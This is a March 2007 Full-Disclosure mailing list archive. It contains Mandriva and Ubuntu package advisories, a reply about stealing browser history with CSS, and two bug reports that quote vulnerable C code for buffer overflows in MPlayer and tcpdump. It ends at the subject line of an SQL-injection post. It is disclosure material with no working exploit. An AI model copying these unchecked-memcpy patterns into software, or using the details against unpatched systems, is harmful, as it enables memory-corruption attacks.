From security at mandriva.com Thu Mar 1 01:39:14 2007
From: security at mandriva.com (security at mandriva.com)
Date: Wed, 28 Feb 2007 18:39:14 -0700
Subject: [Full-disclosure] [ MDKSA-2007:051 ] - Updated snort packages fix DoS vulnerability
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

 Mandriva Linux Security Advisory                         MDKSA-2007:051
 http://www.mandriva.com/security/
_______________________________________________________________________

 Package : snort
 Date    : February 28, 2007
 Affected: 2006.0, 2007.0, Corporate 4.0, Multi Network Firewall 2.0
_______________________________________________________________________

 Problem Description:

 Algorithmic complexity vulnerability in Snort before 2.6.1, during
 predicate evaluation in rule matching for certain rules, allows remote
 attackers to cause a denial of service (CPU consumption and detection
 outage) via crafted network traffic, aka a backtracking attack.

 Updated packages have been patched to address this issue.
_______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6931
_______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2006.0:
 14acfc4ab91f55172378ee21783086d0  2006.0/i586/snort-2.3.3-2.3.20060mdk.i586.rpm
 47737c1cffe59207c0e0117a96ebbd5e  2006.0/i586/snort-bloat-2.3.3-2.3.20060mdk.i586.rpm
 94cef69c4f82524583b93b00ca1885e4  2006.0/i586/snort-inline+flexresp-2.3.3-2.3.20060mdk.i586.rpm
 5c5cb3205151f9378ff26775899cf92a  2006.0/i586/snort-inline-2.3.3-2.3.20060mdk.i586.rpm
 a81892910c6a3b0217c54295cd96f250  2006.0/i586/snort-mysql+flexresp-2.3.3-2.3.20060mdk.i586.rpm
 9fa2f3f800217ca6ee8f4a68087d653e  2006.0/i586/snort-mysql-2.3.3-2.3.20060mdk.i586.rpm
 28ccfe41c7319de41fe264d9dcab936f  2006.0/i586/snort-plain+flexresp-2.3.3-2.3.20060mdk.i586.rpm
 944a116617108b81acdcc69857ef2a72  2006.0/i586/snort-postgresql+flexresp-2.3.3-2.3.20060mdk.i586.rpm
 bc5c0ae549924afc4b764849f9ef2188  2006.0/i586/snort-postgresql-2.3.3-2.3.20060mdk.i586.rpm
 f1af2f22a2cb9842b07126e2a97c3b39  2006.0/i586/snort-snmp+flexresp-2.3.3-2.3.20060mdk.i586.rpm
 78050d7070f70f456d6813767f172a46  2006.0/i586/snort-snmp-2.3.3-2.3.20060mdk.i586.rpm
 469ee540ffd3ddaff34d6d9e44a526bd  2006.0/SRPMS/snort-2.3.3-2.3.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 68080ccee02d86e20f249f17f7d32df1  2006.0/x86_64/snort-2.3.3-2.3.20060mdk.x86_64.rpm
 6c78769ad7344e3c5df82f705bb2c44a  2006.0/x86_64/snort-bloat-2.3.3-2.3.20060mdk.x86_64.rpm
 77d9a51dbaefc07556dfd04bcc785dcf  2006.0/x86_64/snort-inline+flexresp-2.3.3-2.3.20060mdk.x86_64.rpm
 0b072085f8558dc53f22a64933ee715f  2006.0/x86_64/snort-inline-2.3.3-2.3.20060mdk.x86_64.rpm
 6285f03ba66610c0da8eeb096c5e0e6f  2006.0/x86_64/snort-mysql+flexresp-2.3.3-2.3.20060mdk.x86_64.rpm
 07657701d906c8873c089d2714e60333  2006.0/x86_64/snort-mysql-2.3.3-2.3.20060mdk.x86_64.rpm
 950579ea3634f96a34f2df17fab8714b  2006.0/x86_64/snort-plain+flexresp-2.3.3-2.3.20060mdk.x86_64.rpm
 f20d48e02803dadea7a4c6a85917d501  2006.0/x86_64/snort-postgresql+flexresp-2.3.3-2.3.20060mdk.x86_64.rpm
 5db998f1482ec1318938f91cbb1af30f  2006.0/x86_64/snort-postgresql-2.3.3-2.3.20060mdk.x86_64.rpm
 056096e5c2e6766814f2bac64f95f596  2006.0/x86_64/snort-snmp+flexresp-2.3.3-2.3.20060mdk.x86_64.rpm
 50fcc13df4589baab5c3a92e5f8c831a  2006.0/x86_64/snort-snmp-2.3.3-2.3.20060mdk.x86_64.rpm
 469ee540ffd3ddaff34d6d9e44a526bd  2006.0/SRPMS/snort-2.3.3-2.3.20060mdk.src.rpm

 Mandriva Linux 2007.0:
 d29012178cfaf0b37e6b7a76e0b66660  2007.0/i586/snort-2.6.0-3.1mdv2007.0.i586.rpm
 897c2c44ec92bf21f6b9726b4f938ab0  2007.0/i586/snort-bloat-2.6.0-3.1mdv2007.0.i586.rpm
 822a146097d3d78032a926005417d2eb  2007.0/i586/snort-inline+flexresp-2.6.0-3.1mdv2007.0.i586.rpm
 ec191df50521f8d93d3d033d8c3aa2d9  2007.0/i586/snort-inline-2.6.0-3.1mdv2007.0.i586.rpm
 cc7f1773fb2fb17c79ba4c0867435918  2007.0/i586/snort-mysql+flexresp-2.6.0-3.1mdv2007.0.i586.rpm
 aaa7876ca72b1effe2d0c851a28d1cc2  2007.0/i586/snort-mysql-2.6.0-3.1mdv2007.0.i586.rpm
 47f56100d7aa5d5ddcb414212711e942  2007.0/i586/snort-plain+flexresp-2.6.0-3.1mdv2007.0.i586.rpm
 3031d24bfbeb9fa5539fea8e42047c21  2007.0/i586/snort-postgresql+flexresp-2.6.0-3.1mdv2007.0.i586.rpm
 ec7cf5d51dec733e40e37accc46da547  2007.0/i586/snort-postgresql-2.6.0-3.1mdv2007.0.i586.rpm
 9d19e856ecfc5f51a40bb11214fda23d  2007.0/i586/snort-prelude+flexresp-2.6.0-3.1mdv2007.0.i586.rpm
 c63840f49d3b6a890c17bd7a6e5b45ec  2007.0/i586/snort-prelude-2.6.0-3.1mdv2007.0.i586.rpm
 41c885cd6a29670f73505f357e7df534  2007.0/SRPMS/snort-2.6.0-3.1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 b608bd9b32cba92b9fc4b0df3cea10d0  2007.0/x86_64/snort-2.6.0-3.1mdv2007.0.x86_64.rpm
 477a76ade1a59db6a4e899bd1abd3219  2007.0/x86_64/snort-bloat-2.6.0-3.1mdv2007.0.x86_64.rpm
 1040562c56a5f1f651d4fcb520b71401  2007.0/x86_64/snort-inline+flexresp-2.6.0-3.1mdv2007.0.x86_64.rpm
 3c935cf98ea807fb955b4467786dc6d5  2007.0/x86_64/snort-inline-2.6.0-3.1mdv2007.0.x86_64.rpm
 a72f85b6949a00e4d0c125a57274048d  2007.0/x86_64/snort-mysql+flexresp-2.6.0-3.1mdv2007.0.x86_64.rpm
 f815afc9ce1aeb351782e615fbdf7c22  2007.0/x86_64/snort-mysql-2.6.0-3.1mdv2007.0.x86_64.rpm
 26046610206df4cff8508549be74a144  2007.0/x86_64/snort-plain+flexresp-2.6.0-3.1mdv2007.0.x86_64.rpm
 028d7074b920d331685d2599ae0d5fa7  2007.0/x86_64/snort-postgresql+flexresp-2.6.0-3.1mdv2007.0.x86_64.rpm
 7aab39105369c185c70064836b1b81fd  2007.0/x86_64/snort-postgresql-2.6.0-3.1mdv2007.0.x86_64.rpm
 98b2c4ee272001a08fbcb7b9ec6b06ac  2007.0/x86_64/snort-prelude+flexresp-2.6.0-3.1mdv2007.0.x86_64.rpm
 93fb2d5603d8b905f713057fb2f602e6  2007.0/x86_64/snort-prelude-2.6.0-3.1mdv2007.0.x86_64.rpm
 41c885cd6a29670f73505f357e7df534  2007.0/SRPMS/snort-2.6.0-3.1mdv2007.0.src.rpm

 Corporate 4.0:
 acca1849a4344ba21bdd025b4b5df546  corporate/4.0/i586/snort-2.4.5-1.2.20060mlcs4.i586.rpm
 3f0f252ce90cb549389566b1b9fa30e5  corporate/4.0/i586/snort-bloat-2.4.5-1.2.20060mlcs4.i586.rpm
 d1332509d105dc88b52973b0bad0b39e  corporate/4.0/i586/snort-inline+flexresp-2.4.5-1.2.20060mlcs4.i586.rpm
 0ebd8d99f49c643336b27317a007f508  corporate/4.0/i586/snort-inline-2.4.5-1.2.20060mlcs4.i586.rpm
 c3780982acdf477a815653f3cd196592  corporate/4.0/i586/snort-mysql+flexresp-2.4.5-1.2.20060mlcs4.i586.rpm
 165ededf0f837a9ab8d199060ec2f419  corporate/4.0/i586/snort-mysql-2.4.5-1.2.20060mlcs4.i586.rpm
 a8c043893fddd62c031db00562913449  corporate/4.0/i586/snort-plain+flexresp-2.4.5-1.2.20060mlcs4.i586.rpm
 2576dae48c7cdcda07663d9b0076ed3a  corporate/4.0/i586/snort-postgresql+flexresp-2.4.5-1.2.20060mlcs4.i586.rpm
 f2aa1b11e34668f7ed266355e81edf61  corporate/4.0/i586/snort-postgresql-2.4.5-1.2.20060mlcs4.i586.rpm
 092bf95d2d46e7dda7129df5b35f3226  corporate/4.0/i586/snort-prelude+flexresp-2.4.5-1.2.20060mlcs4.i586.rpm
 60deea47ecbe39fa132a33895c68585b  corporate/4.0/i586/snort-prelude-2.4.5-1.2.20060mlcs4.i586.rpm
 12375f9cbbdf27bfc481dbcc05d9fde0  corporate/4.0/i586/snort-snmp+flexresp-2.4.5-1.2.20060mlcs4.i586.rpm
 e74f10ad5826db12ca0769cf9e0c44cb  corporate/4.0/i586/snort-snmp-2.4.5-1.2.20060mlcs4.i586.rpm
 56600d329f0d35d1f168344bd35f70b5  corporate/4.0/SRPMS/snort-2.4.5-1.2.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 1cd573fdc6615ca639e38ba934922076  corporate/4.0/x86_64/snort-2.4.5-1.2.20060mlcs4.x86_64.rpm
 a5f21846da335073bc9220fc58fb1d6c  corporate/4.0/x86_64/snort-bloat-2.4.5-1.2.20060mlcs4.x86_64.rpm
 5d806ad68f4e3fd1d0e5982312a38ab3  corporate/4.0/x86_64/snort-inline+flexresp-2.4.5-1.2.20060mlcs4.x86_64.rpm
 df3a160e22d584e94a174d8770c23147  corporate/4.0/x86_64/snort-inline-2.4.5-1.2.20060mlcs4.x86_64.rpm
 d40e9420d7c66cb1fd8e249e6e0eb540  corporate/4.0/x86_64/snort-mysql+flexresp-2.4.5-1.2.20060mlcs4.x86_64.rpm
 bf85d4875568b7f0730b0a066925b722  corporate/4.0/x86_64/snort-mysql-2.4.5-1.2.20060mlcs4.x86_64.rpm
 6b067b67405af248a7bfd5e2d551f18b  corporate/4.0/x86_64/snort-plain+flexresp-2.4.5-1.2.20060mlcs4.x86_64.rpm
 2de696b63b04481d443e9a85e6d6f655  corporate/4.0/x86_64/snort-postgresql+flexresp-2.4.5-1.2.20060mlcs4.x86_64.rpm
 c10f29fa0e3077f3d89cb3d707c02a5a  corporate/4.0/x86_64/snort-postgresql-2.4.5-1.2.20060mlcs4.x86_64.rpm
 a4e6929e593ed1445b060b1f6e244ab2  corporate/4.0/x86_64/snort-prelude+flexresp-2.4.5-1.2.20060mlcs4.x86_64.rpm
 9b90c281dae9b4f14358d7c35b05c98c  corporate/4.0/x86_64/snort-prelude-2.4.5-1.2.20060mlcs4.x86_64.rpm
 75ffa4a4e0671bad4f4a6548fea5cd51  corporate/4.0/x86_64/snort-snmp+flexresp-2.4.5-1.2.20060mlcs4.x86_64.rpm
 22a7a07d459a48f4cf430bfaf96ccbd9  corporate/4.0/x86_64/snort-snmp-2.4.5-1.2.20060mlcs4.x86_64.rpm
 56600d329f0d35d1f168344bd35f70b5  corporate/4.0/SRPMS/snort-2.4.5-1.2.20060mlcs4.src.rpm

 Multi Network Firewall 2.0:
 587839951c01cdf69b2a60ada22db0a0  mnf/2.0/i586/snort-2.1.0-3.1.M20mdk.i586.rpm
 aee651ef150ac9c9c82626c86e146e81  mnf/2.0/i586/snort-bloat-2.1.0-3.1.M20mdk.i586.rpm
 3a54884ee7391077b16e6693683433a7  mnf/2.0/i586/snort-mysql+flexresp-2.1.0-3.1.M20mdk.i586.rpm
 a6eb3b2df3e971e3d541932c151e2adc  mnf/2.0/i586/snort-mysql-2.1.0-3.1.M20mdk.i586.rpm
 d18a9444b54d7c6edc303ef63e18a9f0  mnf/2.0/i586/snort-plain+flexresp-2.1.0-3.1.M20mdk.i586.rpm
 5dba5abf07bd3e08bb53996d1de3b13e  mnf/2.0/i586/snort-postgresql+flexresp-2.1.0-3.1.M20mdk.i586.rpm
 39f461b7a95df268c4a30f47db064acb  mnf/2.0/i586/snort-postgresql-2.1.0-3.1.M20mdk.i586.rpm
 cb0bcfa2730d36e9d3d2e4af4be3ebd4  mnf/2.0/i586/snort-snmp+flexresp-2.1.0-3.1.M20mdk.i586.rpm
 c07a848d0d6f92fc978708ab8fc5a725  mnf/2.0/i586/snort-snmp-2.1.0-3.1.M20mdk.i586.rpm
 05d54ef33e34c2a30e164fa963eec903  mnf/2.0/SRPMS/snort-2.1.0-3.1.M20mdk.src.rpm
_______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFF5gMMmqjQ0CJFipgRAvvdAKDx62tqnBrWO/W1lxil2ia31zt5RgCePbr0
n1JAWq7D0mAn0SuTFRfLjgI=
=nDNz
-----END PGP SIGNATURE-----

From matthew.flaschen at gatech.edu Thu Mar 1 08:09:18 2007
From: matthew.flaschen at gatech.edu (Matthew Flaschen)
Date: Thu, 01 Mar 2007 03:09:18 -0500
Subject: [Full-disclosure] Stealing Browser History Without Using JavaScript
In-Reply-To:
References: <6905b1570702280843h2d29b8ddl5b5efe065b62a8a2@mail.gmail.com>
Message-ID: <45E68A2E.7030309@gatech.edu>

RSnake wrote:
> In case anyone is interested, I was able to port the old CSS
> history hacking stuff that Jeremiah Grossman originally found to a
> version that does not require JavaScript to fire using images and
> conditional logic built into CSS using a:visited and display attributes.
> It works in both IE7.0 and Firefox 2.0.0.2. Details at the link below:
>
> http://ha.ckers.org/blog/20070228/steal-browser-history-without-javascript/

"We all know there are still people out there who think turning off
JavaScript protects them from everything."

Damn it... Good job. I guess NoScript isn't good enough anymore...

Matt Flaschen

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 254 bytes
Desc: OpenPGP digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070301/2a71eced/attachment.bin

From martin.pitt at canonical.com Thu Mar 1 08:59:26 2007
From: martin.pitt at canonical.com (Martin Pitt)
Date: Thu, 1 Mar 2007 09:59:26 +0100
Subject: [Full-disclosure] [USN-416-2] nvidia-glx-config regression
Message-ID: <20070301085926.GF5529@piware.de>

===========================================================
Ubuntu Security Notice USN-416-2             March 01, 2007
linux-restricted-modules-2.6.17 regression
https://launchpad.net/bugs/66908
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.10:
  nvidia-glx                               2.6.17.7-11.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

USN-416-1 fixed various vulnerabilities in the Linux kernel.
Unfortunately that update caused the 'nvidia-glx-config' script to not
work any more. The new version fixes the problem.

We apologize for the inconvenience.

Updated packages for Ubuntu 6.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/linux-restricted-modules-2.6.17_2.6.17.7-11.2.diff.gz
      Size/MD5:    89152 772068f013e18c8cd3bee371194fe2f5
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/linux-restricted-modules-2.6.17_2.6.17.7-11.2.dsc
      Size/MD5:     2615 9da8b0a95647984a06ba93267b9e303b
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/linux-restricted-modules-2.6.17_2.6.17.7.orig.tar.gz
      Size/MD5: 94289230 283efe66f46b478dea207dac92b7e4e2

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/linux-restricted-modules-common_2.6.17.7-11.2_all.deb
      Size/MD5:    20236 6b55a402fa0930b7e8bb1c16aece8a30

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/avm-fritz-firmware-2.6.17-11_3.11+2.6.17.7-11.2_amd64.deb
      Size/MD5:   476830 0e741afd28ff59f6abdc931b67282dec
    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.17/avm-fritz-kernel-source_3.11+2.6.17.7-11.2_amd64.deb
      Size/MD5:  2130084 09090d30b6bcb16259d0344b5a852e1a
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/fglrx-control_8.28.8+2.6.17.7-11.2_amd64.deb
      Size/MD5:    77616 34b12bc805e4c89b01feb00680ffc62e
    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.17/fglrx-kernel-source_8.28.8+2.6.17.7-11.2_amd64.deb
      Size/MD5:   547560 73ce80f54e6fdb6285601844b4ea5a0a
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/linux-restricted-modules-2.6.17-11-generic_2.6.17.7-11.2_amd64.deb
      Size/MD5:  6652424 62054b3b0326325683edda4581d0a098
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/nic-restricted-firmware-2.6.17-11-generic-di_2.6.17.7-11.2_amd64.udeb
      Size/MD5:   965680 83868530e04da7ea8d665fff5704273b
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/nic-restricted-modules-2.6.17-11-generic-di_2.6.17.7-11.2_amd64.udeb
      Size/MD5:   319162 df364edff08fd7a853c9859813c0bd16
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/nvidia-glx-dev_1.0.8776+2.6.17.7-11.2_amd64.deb
      Size/MD5:   168544 d39fdccbc31828b7e77323645c6c52c6
    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.17/nvidia-glx-legacy-dev_1.0.7184+2.6.17.7-11.2_amd64.deb
      Size/MD5:   162460 3bdec676c86c1702905fc2fdf5067c8b
    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.17/nvidia-glx-legacy_1.0.7184+2.6.17.7-11.2_amd64.deb
      Size/MD5:  6082324 342748fc5510ee9aec287c1c123ae527
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/nvidia-glx_1.0.8776+2.6.17.7-11.2_amd64.deb
      Size/MD5:  7330700 95697ebe21eaac11ece6ae68e2ac280d
    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.17/nvidia-kernel-source_1.0.8776+2.6.17.7-11.2_amd64.deb
      Size/MD5:  1755654 d206422ea23adf9594f9a116a1b098d1
    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.17/nvidia-legacy-kernel-source_1.0.7184+2.6.17.7-11.2_amd64.deb
      Size/MD5:  1383588 fcf770d04fda771f5fb6329c20fe6c08
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/vmware-player-kernel-modules-2.6.17-11_2.6.17.7-11.2_amd64.deb
      Size/MD5:    94200 d4eac639b80fe17067e299e7c02cb7dd
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/xorg-driver-fglrx-dev_7.1.0-8.28.8+2.6.17.7-11.2_amd64.deb
      Size/MD5:   133606 fdf47226d7ee7382f4d59d0f97284752
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/xorg-driver-fglrx_7.1.0-8.28.8+2.6.17.7-11.2_amd64.deb
      Size/MD5: 16016920 f098db02f04188a4be6fe317a433d9ca

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/avm-fritz-firmware-2.6.17-11_3.11+2.6.17.7-11.2_i386.deb
      Size/MD5:  1206380 ac327f27520eec83a2e27b80b195e692
    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.17/avm-fritz-kernel-source_3.11+2.6.17.7-11.2_i386.deb
      Size/MD5:  3426938 4a3ae2b8fc1fbb00e83a6bc1e135be00
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/fglrx-control_8.28.8+2.6.17.7-11.2_i386.deb
      Size/MD5:    74932 2c62b5bd45d2858a3e34876b81d00f17
    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.17/fglrx-kernel-source_8.28.8+2.6.17.7-11.2_i386.deb
      Size/MD5:   701890 acf617420e630b8658dc840ea735ce47
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/linux-restricted-modules-2.6.17-11-386_2.6.17.7-11.2_i386.deb
      Size/MD5:  7886528 88d137b8384971a107f1c5ab0c45b259
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/linux-restricted-modules-2.6.17-11-generic_2.6.17.7-11.2_i386.deb
      Size/MD5:  7681916 cf3e8caa2f28c46fd1e3dc5d4ce3a1b8
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/nic-restricted-firmware-2.6.17-11-386-di_2.6.17.7-11.2_i386.udeb
      Size/MD5:   965578 baca90ec52297ab161a2e436fc47420a
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/nic-restricted-modules-2.6.17-11-386-di_2.6.17.7-11.2_i386.udeb
      Size/MD5:   292852 a57af94e858ce70c9cef0085aff63f99
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/nvidia-glx-dev_1.0.8776+2.6.17.7-11.2_i386.deb
      Size/MD5:   149334 896b0fd94231187c906f3bf0f43a5a42
    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.17/nvidia-glx-legacy-dev_1.0.7184+2.6.17.7-11.2_i386.deb
      Size/MD5:   141534 c834ce2e34d39c890616227a48c165bc
    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.17/nvidia-glx-legacy_1.0.7184+2.6.17.7-11.2_i386.deb
      Size/MD5:  3070512 2c3a44c8fda68f26484ae2bfbc00acd6
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/nvidia-glx_1.0.8776+2.6.17.7-11.2_i386.deb
      Size/MD5:  4066354 a05ebe78d92259f20f02349a3c58d0ff
    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.17/nvidia-kernel-source_1.0.8776+2.6.17.7-11.2_i386.deb
      Size/MD5:  1695566 8ba82743eb1ae5e85d92565039218047
    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.17/nvidia-legacy-kernel-source_1.0.7184+2.6.17.7-11.2_i386.deb
      Size/MD5:  1374622 246ca56d5ced2791d7f93476bb6a8fbd
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/vmware-player-kernel-modules-2.6.17-11_2.6.17.7-11.2_i386.deb
      Size/MD5:   140774 5e926b0db2b94486fb91bed612c415f4
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/xorg-driver-fglrx-dev_7.1.0-8.28.8+2.6.17.7-11.2_i386.deb
      Size/MD5:   117654 7530bbe400b0076a60412d39269a41d9
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/xorg-driver-fglrx_7.1.0-8.28.8+2.6.17.7-11.2_i386.deb
      Size/MD5:  9402352 6a400a29d7dd1bcad6c11699a2019f9f

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/linux-restricted-modules-2.6.17-11-powerpc-smp_2.6.17.7-11.2_powerpc.deb
      Size/MD5:  1285168 6910af095b64409b1b8cc52a02a06c7d
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/linux-restricted-modules-2.6.17-11-powerpc64-smp_2.6.17.7-11.2_powerpc.deb
      Size/MD5:   996538 f8eced58f2639267cb79f9fe93efdda6
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/linux-restricted-modules-2.6.17-11-powerpc_2.6.17.7-11.2_powerpc.deb
      Size/MD5:  1282820 ff15b6f3bf85033b82f6f4568416fc38
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/nic-restricted-firmware-2.6.17-11-powerpc-di_2.6.17.7-11.2_powerpc.udeb
      Size/MD5:   965666 a81bb2a0dc7b79814bc7ac16f90f9f61
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/nic-restricted-modules-2.6.17-11-powerpc-di_2.6.17.7-11.2_powerpc.udeb
      Size/MD5:   287196 1d9f7bc395068e1f1ce14d8f357b4705

  sparc architecture (Sun SPARC/UltraSPARC)

    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/linux-restricted-modules-2.6.17-11-sparc64-smp_2.6.17.7-11.2_sparc.deb
      Size/MD5:   996508 567181402aeb05c1accbeada9f0bf99b
    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.17/linux-restricted-modules-2.6.17-11-sparc64_2.6.17.7-11.2_sparc.deb
      Size/MD5:   996420 6d8c1f804d88990f158cf2d1240cf1b7

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070301/1bea58c7/attachment.bin

From moritz at jodeit.org Thu Mar 1 12:08:45 2007
From: moritz at jodeit.org (Moritz Jodeit)
Date: Thu, 1 Mar 2007 13:08:45 +0100
Subject: [Full-disclosure] MPlayer DMO buffer overflow
Message-ID: <20070301120845.GA16@fugu1.local>

There's an exploitable buffer overflow in the current version of MPlayer
(v1.0rc1) which can be exploited with a maliciously crafted video file.
It's hidden in the function DMO_VideoDecoder() in the file
loader/dmo/DMO_VideoDecoder.c. The variable format->biSize gets its
value directly from the video file, and thus can have any value up to
LONG_MAX. In line 136 it is used without any further checks as the
length argument to the memcpy() call, which can overflow the
this->m_sVhdr->bmiHeader buffer with data directly from the video file.

    117     unsigned int bihs;
    118
    119     bihs = (format->biSize < (int) sizeof(BITMAPINFOHEADER)) ?
    120         sizeof(BITMAPINFOHEADER) : format->biSize;
    121
    122     this->iv.m_bh = malloc(bihs);
    123     memcpy(this->iv.m_bh, format, bihs);
    124
    125     this->iv.m_State = STOP;
    126     //this->iv.m_pFrame = 0;
    127     this->iv.m_Mode = DIRECT;
    128     this->iv.m_iDecpos = 0;
    129     this->iv.m_iPlaypos = -1;
    130     this->iv.m_fQuality = 0.0f;
    131     this->iv.m_bCapable16b = true;
    132
    133     bihs += sizeof(VIDEOINFOHEADER) - sizeof(BITMAPINFOHEADER);
    134     this->m_sVhdr = malloc(bihs);
    135     memset(this->m_sVhdr, 0, bihs);
    136     memcpy(&this->m_sVhdr->bmiHeader, this->iv.m_bh, this->iv.m_bh->biSize);

This got fixed [1] in trunk two weeks ago.

[1] http://svn.mplayerhq.hu/mplayer/trunk/loader/dmo/DMO_VideoDecoder.c?r1=22019&r2=22204

Best,
Moritz Jodeit

From moritz at jodeit.org Thu Mar 1 12:59:23 2007
From: moritz at jodeit.org (Moritz Jodeit)
Date: Thu, 1 Mar 2007 13:59:23 +0100
Subject: [Full-disclosure] tcpdump: off-by-one heap overflow in 802.11 printer
Message-ID: <20070301125923.GA10682@fugu1.local>

There's an off-by-one heap overflow in the ieee802.11 printer, which can
be triggered by a maliciously crafted 802.11 frame. The link type must
have been explicitly specified for this to work.

The function parse_elements() in print-802_11.c checks the length
pbody->tim.length from the frame for too small values in line 265, but
then uses the wrong variable in the following range check in line 267.
Since pbody->tim.length is defined as a u_int8_t it can hold a maximum
value of 255, which in turn would copy 252 bytes into pbody->tim.bitmap,
which is only 251 bytes in size.

    253         case E_TIM:
    254             /* Present, possibly truncated */
    255             pbody->tim_status = TRUNCATED;
    256             if (!TTEST2(*(p + offset), 2))
    257                 return;
    258             memcpy(&pbody->tim, p + offset, 2);
    259             offset += 2;
    260             if (!TTEST2(*(p + offset), 3))
    261                 return;
    262             memcpy(&pbody->tim.count, p + offset, 3);
    263             offset += 3;
    264
    265             if (pbody->tim.length <= 3)
    266                 break;
    267             if (pbody->rates.length > sizeof pbody->tim.bitmap)
    268                 return;
    269             if (!TTEST2(*(p + offset), pbody->tim.length - 3))
    270                 return;
    271             memcpy(pbody->tim.bitmap, p + (pbody->tim.length - 3),
    272                 (pbody->tim.length - 3))

The current tcpdump release 3.9.5 is still vulnerable. This got fixed [1]
in CVS Head and in the tcpdump_3_9 branch.

[1] http://cvs.tcpdump.org/cgi-bin/cvsweb/tcpdump/print-802_11.c?r1=1.42&r2=1.43

Best,
Moritz Jodeit

From samuschie at yahoo.de Thu Mar 1 16:55:13 2007
From: samuschie at yahoo.de (SaMuschie)
Date: Thu, 1 Mar 2007 17:55:13 +0100 (CET)
Subject: [Full-disclosure] Serendipity unauthenticated SQL-Injection
